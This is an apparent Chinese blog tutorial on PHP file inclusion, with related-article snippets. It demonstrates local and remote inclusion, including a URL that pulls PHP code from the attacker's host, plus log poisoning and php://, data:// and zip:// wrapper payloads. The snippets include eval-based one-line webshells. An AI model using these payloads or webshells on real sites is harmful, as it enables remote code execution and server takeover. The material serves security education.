文件 包含

最新推荐文章于 2024-03-22 14:50:16 发布
最新推荐文章于 2024-03-22 14:50:16 发布
阅读量668 收藏
点赞数 1
文章标签: 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123181121
版权

概念

把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,无需再次编写函数。

原理

文件包含漏洞产生的原因是在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入

1.本地文件包含(无视后缀)

创建文件包含:include.php

<?php
include("print.php");
?>

另创建print.php

<?php
echo "hello world!!!";
?>

在浏览器访问include.php

分别修改print.txt扩展名为:jpg、rar、xxx发现均可解析,只要文件内容符合PHP语法规范,任何扩展名都可以被PHP解析。

2.远程文件包含getshell

1)目标机allow_url_include开启

2)编辑include.php,并上传至目标机网站根目录中

3)在本地网站根目录下新建phpinfo.php文件

4)远程包含shell

http://目标机ip/include.php?a=http://操作机ip/phpinfo.php

 3.apache日志文件包含

1)开启日志记录

打开apache安装目录下的conf/httpd.conf配置文件找到:

 CustomLog "logs/access.log" common 去掉前面的#号

 2)访问

http://本机ip/<?php phpinfo();?>

查看日志access.log 

发现符号被编码

利用Burpsuite抓包

将被编码的符号修改回去,并发送,再次查看日志

phpinfo已被写入

http://192.168.5.44/include.php?a=D:\phpStudy2018\PHPTutorial\Apache\logs\access.log

4.php封装伪协议

1)php流input

http://127.0.0.1/include.php?a=php://input

 2)php流filter

?a=php://filter/read=convert.base64-encode/resource=print.php

 3)zip://

先将要执行的php代码写好,在进行zip压缩(如果失败可将压缩后的zip改为jpg)

使用zip协议需要指定绝对路径,使用相对路径会包含失败;同时将#编码为%23

4)data://

命令执行(php版本大于等于5.2,allow_url_include和allow_url_fopen都为on的状态)

http://127.0.0.1/include.php?a=data://text/plain,<?php phpinfo();?>

http://127.0.0.1/include.php?a=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

 5)phar://

Z_l123
关注
文件操作安全之-文件包含原理篇
村中少年的专栏
10-10 1029
文件包含漏洞的原理,文件包含漏洞的具体案例,例如CVE-2018-17246 kibana文件包含漏洞和CVE-2018-12613 phpMyAdmin 文件包含漏洞,以及上传漏洞潜在的危害阐述文件包含漏洞中的安全问题。
dvwa 文件上传 high等级文件上传 low命令执行+文件包含
weixin_45498459的博客
04-26 2065
文件包含 low <?php phpinfo();@eval($_POST[pp]);?>创建 a1.php 写入一句话木马 访问链接 127.0.0.1/dvwa-master/vulnerabilities/upload/../../hackable/uploads/a1.php ​ medium 需要用到 bp 和低等级代码比较 多了一条校验 mime类型的过滤条件 可以用 bp抓包修改 打开浏览器 代理 设置好bp的地址两边需要相同的ip和端..
zip文件协议解析
DefiniteGoal的博客
08-08 1857
ZIP文件协议解析
zip文件协议&gzip文件协议
DefiniteGoal的博客
08-19 1260
zip及gzip协议
文件包含技巧拓展】————2、zip或phar协议包含文件
Fly_鹏程万里
01-30 3288
这个方法适用于验证包含文件为特定后缀时。 例如以下代码 &lt;?php $file = $_GET['file']; if(isset($file) &amp;&amp; strtolower(substr($file, -4)) == ".jpg"){ include($file); } ?&gt; &lt;?php $file = $_GET['file']; include($fi...
文件包含漏洞相关协议详解
永远是少年
12-13 2597
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞相关协议详解。 一、文件包含常用协议 1、file协议 2、php相关协议 3、zip协议 4、data协议 5、其他协议 二、各协议利用条件
文件包含中PHP伪协议学习笔记
最新发布
2302_80935968的博客
03-22 1135
1.当allow_url_fopen=Off和allow_url_include=Off或allow_url_fopen=Off和allow_url_include=On时,文件包含失败。data:// 同样类似与php://input,可以让用户来控制输入流,当它与包含函数结合时,用户输入的data://流会被当作php文件执行。2.当allow_url_fopen=On和allow_url_include=On时,include等其他包含函数才会将URL代表的文件包含执行,文件包含成功。
故障录波文件包括CFG/DAT
07-26
录波文件CFG、DAT
信息安全技术基础:本地文件包含漏洞.pptx
11-01
【信息安全技术基础:本地文件包含漏洞】 在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许...
web-文件包含
bingo_csdn的博客
10-29 2299
inclued:出错会继续执行 require:出错会退出 1、本地文件包含: 测试代码1.php如下所示: <?php //初始化.... define("ROOT",dirname(__FILE__).'/'); //加载模块 $mod = $_GET['mod']; echo ROOT.$mod.'.php'; include(ROOT.$mod.'.php'); ?> 我们在同目录下2.php写入如下代码: <?php phpinfo();?> 请求/1.php?mod=2即
利用zip(或者phar)协议进行本地文件包含
weixin_30907523的博客
04-14 531
$include_file=$_GET[include_file];if ( isset( $include_file ) && strtolower( substr( $include_file, -4 ) ) == ".php" ){require( $include_file );} 1.php->phpinfo()->.zip->zip://xxx/xx...
zip和phar文件包含
L1ni01
12-06 2070
zip和phar文件包含 phar文件包含 phar协议要求:php大于5.3.0 需要将php.ini的参数phar.readonly设置为off 这个方法适用于验证包含文件为特定后缀时。 使用Phar://伪协议流可以Bypass一些上传的waf,大多数情况下和文件包含一起使用,就类似于我们的压缩包(其实就是一个压缩包),只不过我们换了一种方式去执行而已 本地测试: test.php <?php @eval($_POST["cmd"]);?> 然后将test.php压缩,将压缩文件改后缀为
配合php伪协议利用文件包含漏洞
超人学飞的日子
06-06 9240
php支持多种封装协议,这些协议常被CTF出题中与文件包含漏洞结合,这里做个小总结。实验用的是DVWA平台,low级别,phpstudy中的设置为5.4.45版本,设置allow_url_fopen和allow_url_include都为On.index.phpindex.php同级目录下有mytest001.txt ,mytest002.txt ,mytest003.zip(其中包含mytest...
文件包含-伪协议
孤的博客
10-02 9008
文件包含漏洞利用的前提 1.web 应用采用 include 等文件包含函数,并且需要包含文件路径是通过用户传输参数的方式引入; 2.用户能够控制包含文件的参数,被包含文件可被当前页面访问; 在使用文件包含漏洞时,必须要能知道其绝对路径 方法: 在包含文件处,查看其返回的错误的信息 伪协议文件包含 file:// 访问本地文件系统 http:// 访问 HTTPs 网址 ftp:// ...
文件包含支持的伪协议
qq_50673174的博客
05-15 8574
文件包含漏洞的补充。 主要是文件包含漏洞支持的伪协议。
文件包含漏洞 TIPS
3569
12-14 2198
https://www.chery666.cn/blog/2017/06/17/include.html 0x01 原理 网页代码在通过函数复用文件时,未对文件名进行安全检查时,从而导致恶意代码执行和敏感信息泄露。主要分为本地包含(LFI)和远程包含 (RFI) 涉及到的危险函数:include(),require() 和 include_once(),require_onc
文件上传】zip伪协议上传解析
serendipity1130的博客
08-29 2058
1.打开界面是登陆框,查看源码,发现有文件包含include($_GET['file']) 2.然后根据题目名称:文件上传,访问网址:/upload.php发现了文件上传点,先上传了jpg图片,发现不能用菜刀连接,应该是无法解析jpg。 3.因为有文件包含,所以考虑到使用伪协议包含木马图片的文件进行菜刀连接,因为都有过滤,最终尝试了zip伪协议可以进行访问。 4.方法:首先制作一句话木马的zip包,然后将后缀名改为jpg,进行上传,上传成功后复制图片地址,可以发现图片的地址为upload/2.jpg
本地文件包含漏洞详解
热门推荐
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
深入理解PHP文件包含漏洞:原理、利用与防御
本地文件包含漏洞允许攻击者通过操纵变量来包含服务器上的任意文件,而远程文件包含漏洞则允许攻击者通过变量包含网络上的任何可访问文件,这通常导致更严重的安全风险,因为攻击者可以执行远程服务器上的恶意代码。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值